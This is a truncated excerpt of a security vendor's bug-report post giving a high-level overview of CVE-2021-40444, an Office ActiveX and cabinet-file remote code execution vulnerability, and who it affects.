The Bug Report | September 2021: CVE-2021-40444

Why am I here?


There’s a lot of information out there on critical vulnerabilities; this short bug report contains an overview of what we believe to be the most news and noteworthy vulnerabilities. We don’t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. Today, we’ll be focusing on CVE-2021-40444.


CrossView: CVE-2021-40444


What is it?


CVE-2021-40444 is a vulnerability in Office applications which use protected view such as Word, PowerPoint and Excel which allows an attacker to achieve remote code execution (RCE). CVE-2021-40444 is a vulnerability which allows a carefully crafted ActiveX control and a malicious MS Cabinet (.cab) file to be launched from an Office document. 


Most importantly, this vulnerability impacts the applications themselves, as well as the Windows Explorer preview pane.


Who cares?


This is a great question! Pretty much anyone who uses any Microsoft Office applications, or has them installed, should be concerned.


Office is one of the most widely-used applications on the planet. Odds are good you have it open right now. While many companies have disabled macros within Office documents at the Group Policy level, it is unlikely ActiveX is treated similarly. This means that without proper data hygiene, a large proportion of Office users will be vulnerable to this exploit.


Fortunately, “spray and pray” style email campaigns are unlikely to gain traction with this exploit, as mail pro ..

Support the originator by clicking the read the rest link below.